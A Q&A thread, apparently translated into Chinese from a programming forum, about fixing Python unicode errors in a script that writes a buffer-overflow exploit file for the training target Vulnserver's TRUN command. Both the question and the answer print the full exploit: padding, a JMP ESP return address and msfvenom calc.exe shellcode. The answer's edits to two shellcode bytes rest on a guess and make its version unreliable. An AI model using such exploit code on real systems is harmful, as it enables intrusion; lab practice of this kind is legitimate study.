Python脚本生成带有漏洞利用代码的文件-unicodeescape Unicode错误

Question

我正在编写一个脚本，该脚本应生成一个文件以利用Vulnserver 。

一切似乎都很好，但是后来我添加了shellcode，现在遇到了unicode错误（unicodeescape）。

#!C:\Users\user\AppData\Local\Programs\Python\Python36\python.exe

import sys, struct

file_suffix='shellcode.txt'
buf='.'

buf+='A'*2006 # buffer

#buf+=''*4 #EIP
#buf+=struct.pack('<I', 0x625011AF) # JMP ESP at 625011AF in essfunc.dll
buf+='\xaf\x11\x50\x62'

#buf+='C'*2000 # space for shellcode
# msfvenom -p windows/exec CMD=calc.exe -f python -b '\x00'
buf += "\xd9\xcb\xbd\x1a\xe4\x34\x1e\xd9\x74\x24\xf4\x5a\x2b"
buf += "\xc9\xb1\x31\x31\x6a\x18\x03\x6a\x18\x83\xc2\x1e\x06"
buf += "\xc1\xe2\xf6\x44\x2a\x1b\x06\x29\xa2\xfe\x37\x69\xd0"
buf += "\x8b\x67\x59\x92\xde\x8b\x12\xf6\xca\x18\x56\xdf\xfd"
buf += "\xa9\xdd\x39\x33\x2a\x4d\x79\x52\xa8\x8c\xae\xb4\x91"
buf += "\x5e\xa3\xb5\xd6\x83\x4e\xe7\x8f\xc8\xfd\x18\xa4\x85"
buf += "\x3d\x92\xf6\x08\x46\x47\x4e\x2a\x67\xd6\xc5\x75\xa7"
buf += "\xd8\x0a\x0e\xee\xc2\x4f\x2b\xb8\x79\xbb\xc7\x3b\xa8"
buf += "\xf2\x28\x97\x95\x3b\xdb\xe9\xd2\xfb\x04\x9c\x2a\xf8"
buf += "\xb9\xa7\xe8\x83\x65\x2d\xeb\x23\xed\x95\xd7\xd2\x22"
buf += "\x43\x93\xd8\x8f\x07\xfb\xfc\x0e\xcb\x77\xf8\x9b\xea"
buf += "\x57\x89\xd8\xc8\x73\xd2\xbb\x71\x25\xbe\x6a\x8d\x35"
buf += "\x61\xd2\x2b\x3d\x8f\x07\x46\x1c\xc5\xd6\xd4\x1a\xab"
buf += "\xd9\xe6\x24\x9b\xb1\xd7\xaf\x74\xc5\xe7\x65\x31\x39"
buf += "\xa2\x24\x13\xd2\x6b\xbd\x26\xbf\x8b\x6b\x64\xc6\x0f"
buf += "\x9e\x14\x3d\x0f\xeb\x11\x79\x97\x07\x6b\x12\x72\x28"
buf += "\xd8\x13\x57\x4b\xbf\x87\x3b\xa2\x5a\x20\xd9\xba"

stat_opt='TRUN'

content=stat_opt+' '+buf
f = open(stat_opt+file_suffix,"w")
f.write(content)
f.close()

然后，将生成的文件与ncat发送到vulnserver。

如何成功写入文件，其中包含上面脚本中定义的字符串（以TRUN .AAAA[...]开头），然后是值\\xaf\\x11\\x50\\x62 ，然后是外壳代码？

编辑完全忘记了回溯：

  File "gen.py", line 16
    buf+="\xd9\xcb\xbd\x1a\xe4\x34\x1e\xd9\x74\x24\xf4\x5a\x2"
        ^
SyntaxError: (unicode error) 'unicodeescape' codec can't decode bytes in position 48-50: truncated \xXX escape

edit2我想将字节码写入文件，由十六进制值表示。

edit3我从msfvenom重新复制了外壳程序代码， msfvenom单字符十六进制值正确（脚本已更新）。 但是我有一个新的追溯：

Traceback (most recent call last):
  File "gen.py", line 38, in <module>
    f.write(content)
  File "C:\Users\user\AppData\Local\Programs\Python\Python36\lib\encodings\cp1252.py", line 19, in encode
    return codecs.charmap_encode(input,self.errors,encoding_table)[0]
UnicodeEncodeError: 'charmap' codec can't encode character '\x83' in position 2038: character maps to <undefined>

Answer 1

每个十六进制代码都需要两位数字，但是第一行的末尾有\\x2这会造成问题。 我不知道可能一定是\\x02

您还\\xa在其他行的末尾-也许你需要\\x0a

Python将其视为UNICODE文本，并尝试使用CP1252 （ Code Page 1252 ）转换为字节

更好地使用bytes -将前缀b添加到所有文本。 并用wb保存在文件中

buf = b'.'
buf += b'A'*2006 # buffer

buf += b'\xaf\x11\x50\x62' # EIP; JMP ESP at 625011AF in essfunc.dll

#buf+='C'*2000 # space for shellcode
# Generated with: msfvenom -p windows/exec CMD=calc.exe -f python -b '\x00'
buf += b"\xd9\xcb\xbd\x1a\xe4\x34\x1e\xd9\x74\x24\xf4\x5a\x02"
buf += b"\xc9\xb1\x31\x31\x6a\x18\x03\x6a\x18\x83\xc2\x1e\x06"
buf += b"\xc1\xe2\xf6\x44\x2a\x1b\x06\x29\xa2\xfe\x37\x69\xd0"
buf += b"\x8b\x67\x59\x92\xde\x8b\x12\xf6\xca\x18\x56\xdf\xfd"
buf += b"\xa9\xdd\x39\x33\x2a\x4d\x79\x52\xa8\x8c\xae\xb4\x91"
buf += b"\x5e\xa3\xb5\xd6\x83\x4e\xe7\x8f\xc8\xfd\x18\xa4\x85"
buf += b"\x3d\x92\xf6\x08\x46\x47\x4e\x2a\x67\xd6\xc5\x75\xa7"
buf += b"\xd8\x0a\x0e\xee\xc2\x4f\x2b\xb8\x79\xbb\xc7\x3b\xa8"
buf += b"\xf2\x28\x97\x95\x3b\xdb\xe9\xd2\xfb\x04\x9c\x2a\xf8"
buf += b"\xb9\xa7\xe8\x83\x65\x2d\xeb\x23\xed\x95\xd7\xd2\x22"
buf += b"\x43\x93\xd8\x8f\x07\xfb\xfc\x0e\xcb\x77\xf8\x9b\xea"
buf += b"\x57\x89\xd8\xc8\x73\xd2\xbb\x71\x25\xbe\x6a\x8d\x35"
buf += b"\x61\xd2\x2b\x3d\x8f\x07\x46\x1c\xc5\xd6\xd4\x1a\x0a"
buf += b"\xd9\xe6\x24\x9b\xb1\xd7\xaf\x74\xc5\xe7\x65\x31\x39"
buf += b"\xa2\x24\x13\xd2\x6b\xbd\x26\xbf\x8b\x6b\x64\xc6\x0f"
buf += b"\x9e\x14\x3d\x0f\xeb\x11\x79\x97\x07\x6b\x12\x72\x28"
buf += b"\xd8\x13\x57\x4b\xbf\x87\x3b\xa2\x5a\x20\xd9\xba"

content = b'TRUN '+buf

f = open('TRUNshellcode_test.txt', "wb")
f.write(content)

f.close()